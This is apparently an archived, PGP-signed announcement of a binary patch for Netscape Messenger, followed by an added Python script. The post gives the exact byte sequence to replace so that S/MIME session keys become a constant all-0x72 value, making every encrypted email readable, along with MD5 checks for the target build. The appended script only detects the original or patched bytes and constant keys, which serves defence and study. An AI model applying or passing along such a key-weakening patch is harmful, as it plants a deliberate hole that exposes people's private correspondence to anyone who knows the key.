
announce: WEAK S/MIME support for netscape messenger




-----BEGIN PGP SIGNED MESSAGE-----

Hello all,
here's a new weaken patch, this time for netscape's mail client with S/MIME support.
when you send an encrypted email, it is first encrypted with a secret key. the secret
key is then encrypted with the recipient's public key.
this patch will modify netscape's mail client so that whenever it generates a
new key, it generates an all 0x72s key.
i hope i'll find time to release an S/MIME encrypted message parser... so that
anyone can verify the info.

the magic sequence :
look for :
51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8
and change with
6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff
by just changing 9 bytes, you can read all the encrypted emails ! 
like the previous sequence, this substitutes a call to GenerateRandom with a memset.
of course it may be possible to do something more clever, like hashing a 16-bit
random key to produce a 128-bit one ! my ex-boss is already doing that.

here's how to know if the weaken sequence works on your browser:
use the md5 in fortify distrib
md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe
that should produce
aea2aba6f731468e34fd1141f603ea20

the md5 for the whole program (netscape.exe) is :
294dfe9a5e941d12b04e10adafb0c769



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: cp850

iQCVAwUBNTKmWpVRLpSyKBl9AQGVAgP+Opot5VnJOouhwcS58JIdur1Q+xd2twWR
/1q0SlpfsaTi99YIgFBrDpoVhqrW+wQWJmFmGppR5wZtyMNbSm3GPaRm0m9wAOiK
vXsxS9VapEgjVh50caeTEh7e6GEwNBhNEENKbt1WvGWTrnh7K8dqiC3Pla7kmG3Q
syimJN1toCs=
=GIYU
-----END PGP SIGNATURE-----
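
An added example, not part of the original post: a check that reports whether a binary image contains the original or the weakened byte sequence quoted in the message, and whether a recovered session key has the constant-byte form the message describes. The function names and the sample images in the test are constructed for illustration; only the two hex sequences come from the post.

```python
"""Classify a binary by which of the post's two byte sequences it contains."""
import sys
from pathlib import Path

# Both sequences are copied verbatim from the post.
ORIGINAL = bytes.fromhex("51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8")
PATCHED = bytes.fromhex("6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff")


def changed_offsets():
    """Indices within the sequence where the two versions differ."""
    return [i for i, (a, b) in enumerate(zip(ORIGINAL, PATCHED)) if a != b]


def find_all(data, needle):
    """Every file offset at which needle occurs in data."""
    offsets, pos = [], data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


def classify(data):
    """Return (state, offsets): 'original', 'patched', 'both' or 'unknown'."""
    orig, weak = find_all(data, ORIGINAL), find_all(data, PATCHED)
    if orig and weak:
        return "both", sorted(orig + weak)
    if weak:
        return "patched", weak
    if orig:
        return "original", orig
    # Neither sequence present: a different build, so this check says nothing.
    return "unknown", []


def is_constant_key(key):
    """True when every byte of a session key is identical (e.g. all 0x72)."""
    return len(key) > 0 and len(set(key)) == 1


if __name__ == "__main__" and len(sys.argv) == 2:
    state, offsets = classify(Path(sys.argv[1]).read_bytes())
    print(state, [hex(o) for o in offsets])
```

An "unknown" result only means the binary is a different build from the one the post targets; it is not evidence that the random-key generation is intact.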
